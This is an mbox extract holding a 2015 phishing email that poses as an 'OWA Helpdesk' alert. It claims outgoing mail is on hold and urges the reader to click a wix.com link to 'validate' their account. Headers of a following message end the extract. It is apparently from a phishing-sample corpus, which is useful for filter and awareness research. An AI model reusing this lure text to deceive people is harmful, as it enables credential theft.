From: May Sandnes <May.Sandnes@bodo.kommune.no>
To: "in@owa.org" <in@owa.org>
Subject: Mailbox Alert!!!
Thread-Topic: Mailbox Alert!!!
Thread-Index: AdEYn1S77Xu2OhgtRlyOq6sTQtrphg==
Date: Fri, 6 Nov 2015 14:27:57 +0000
Message-ID: <2FDD4A4BE78EBF409413703B1E741672A20047D4@BKEXCH03.bkad.local>
Accept-Language: nb-NO, en-US
Content-Language: nb-NO
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [41.138.183.104]
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-TM-AS-MML: disable
X-TM-AS-Product-Ver: IMSVA-8.5.0.1165-8.0.0.1202-21150.006
X-TM-AS-Result: No-3.646-5.0-31-10
X-imss-scan-details: No-3.646-5.0-31-10
X-TM-AS-User-Approved-Sender: No
X-TM-AS-Result-Xfilter: Match text exemption rules:No
X-TMASE-Version: IMSVA-8.5.0.1165-8.0.1202-21150.006
X-TMASE-Result: 10-3.646100-5.000000
X-TMASE-MatchedRID: u7xoeCnhTGfqvccKLF+4pxziuLhElX/VHJRksWeLoCZ2+AZuxakJyz5y
	NRGdBvJsU3mQhmdh4RgMH4SsGvRsA3G1ZiUO5FCl2oLGTNKlb9eNgCT7rrYqS2/ALEXipmpJBRT
	AgbiYIXNLa9v9GH70hTXLr2C1AxNH0nXvwjW2mSVuNeHxCndblcTq0Z1Y2y/LrD+NR47KQUnqR0
	ztm0W62K2HRIS8LpzU/zHKAEIZbPR3Pay1hyaX18Xt25YNeIUSooRFoM4jwoVN0KrGYOgDVZT4i
	W2nbmNTlRTb2s9TqjKeAiCmPx4NwGNn8XPiALIbg0aBGFrNAz1eiNus3Xp+7j1KA5MW4rtWjEMJ
	8kmkRUi5KgJih4tejhet415RhnEp1LDB91IQyL9jAmvALsG5O6hy2MqvfJfZS6HbSCjmUjndpW8
	pXHudjt6WgLuyEhVeDpalYopLatFjJqKNaiA7/bB0hLwqUMAfw8g2HBNcF5k=
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 239

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style type=3D"text/css" id=3D"owaParaStyle"></style>
</head>
<body fpstyle=3D"1" ocsi=3D"0">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;"><br>
<div><br>
<div style=3D"font-family:Tahoma; font-size:13px">
<div style=3D"font-family:Tahoma; font-size:13px">
<div style=3D"font-family:Tahoma; font-size:13px">
<div style=3D"font-family:Tahoma; font-size:13px">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
Your two (2) outgoing mails have been placed on hold due to the recent upgr=
ade in our database.</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
&nbsp;</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
You are required to immediately validate and re-set your Email account spac=
e on our database:</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
<span style=3D"line-height: 21.3px;">Kindly click&nbsp;<font color=3D"#0068=
cf"><span style=3D"line-height: 21.3px; font-weight: inherit; cursor: point=
er;"><a href=3D"http://linkclick24.wix.com/outlook-app">Only Here</a></span=
></font>&nbsp;</span><span style=3D"line-height: 21.3px;">to
 update your Outlook &nbsp;Email Account.</span></div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
&nbsp; &nbsp; &nbsp;&nbsp;</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
We apologize for any inconvenience and do appreciate your corporation &nbsp=
;an understanding.</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</div>
<div style=3D"font-family: Calibri, sans-serif; line-height: 21.3px; color:=
 rgb(68, 68, 68); font-size: 15px; background-color: rgb(255, 255, 255);">
OWA Helpdesk ISQ=A92015 Outlook Web App Team.</div>
</div>
</div>
</div>
<div style=3D"font-family:Tahoma; font-size:13px"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

From jose@monkey.org Sat Nov  7 09:02:52 2015 +0000
Return-Path: prvs=7464c453b=tdelosreyes@alamedahealthsystem.org
Delivered-To: jose@monkey.org
X-FDA: 70827214584.14.pipe83_8d73da1453338
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 18,1.407,0,bb2efd89450cb0c9,d41d8cd98f00b204,prvs=7464c453b=tdelosreyes@alamedahealthsystem.org,,RULES_HIT:10:41:72:355:379:582:589:800:960:962:967:973:983:988:989:1152:1189:1208:1221:1252:1256:1260:1261:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1568:1575:1588:1589:1592:1594:1711:1714:1730:1776:1792:2527:2559:2562:2890:2899:2902:2909:3138:3139:3140:3141:3142:3586:3865:3867:3868:3871:3873:4042:4552:5007:6117:6261:6678:8603:8797:8957:9177:10004:10044:10134:10135:10215:10241:10400:10429:10430:10431:10798:11245:11473:11537:11656:11658:11914:12043:12225:12295:12331:12519:12521:12555:12660:12661:13019:13095:13139:13218:13229:14093:14659:19903:19997:30001:30003:30022:30034:30037:30039:30052:30054:30069:30083:30091,0,RBL:63.241.90.5:@alamedahealthsystem.org:.lbl8.mailshell.net-62.8.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:70,LUA_SUMMARY:none
X-HE-Tag: pipe83_8d73da1453338
X-Filterd-Recvd-Size: 4115
Received: from esa2.acmedctr.org (esa2.acmedctr.org [63.241.90.5])
	by imf27.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat,  7 Nov 2015 09:02:51 +0000 (UTC)
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: A3l+eAAwvT1W/+AQigpeEoJcTYFCBgGCV7cchXgmhhACgSlMAQEBAQEBAwGBSBEBg1oPR0QBBQcBKAECDAM5FBIBCgEMCIVqgjwFlD+MMJNLgT8XgR2JdAEsj3wPAgEPED8JBoFrcR+BFQWNVIh0AY5/hECDGY8eg3JjhAQ+HReDSQMHFwccAXwKAQEB
X-IPAS-Result: A3l+eAAwvT1W/+AQigpeEoJcTYFCBgGCV7cchXgmhhACgSlMAQEBAQEBAwGBSBEBg1oPR0QBBQcBKAECDAM5FBIBCgEMCIVqgjwFlD+MMJNLgT8XgR2JdAEsj3wPAgEPED8JBoFrcR+BFQWNVIh0AY5/hECDGY8eg3JjhAQ+HReDSQMHFwccAXwKAQEB
X-IronPort-AV: E=Sophos;i="5.20,256,1444719600"; 
   d="scan'208,217";a="39314964"
Received: from unknown (HELO ACMC-CAS-HUB01.acmedctr.ad) ([10.138.10.85])
  by esa2.acmedctr.org with ESMTP/TLS/AES128-SHA; 07 Nov 2015 01:02:50 -0800
Received: from ACMC-RWC-CH01.acmedctr.ad (10.138.16.224) by
 ACMC-CAS-HUB01.acmedctr.ad (10.138.10.85) with Microsoft SMTP Server (TLS) id
 14.3.158.1; Sat, 7 Nov 2015 01:01:23 -0800
Received: from ACMC-RWC-MB01.acmedctr.ad ([fe80::8d31:bef7:7795:dd13]) by
 acmc-rwc-ch01.acmedctr.ad ([::1]) with mapi id 14.03.0158.001; Sat, 7 Nov
 2015 01:01:22 -0800
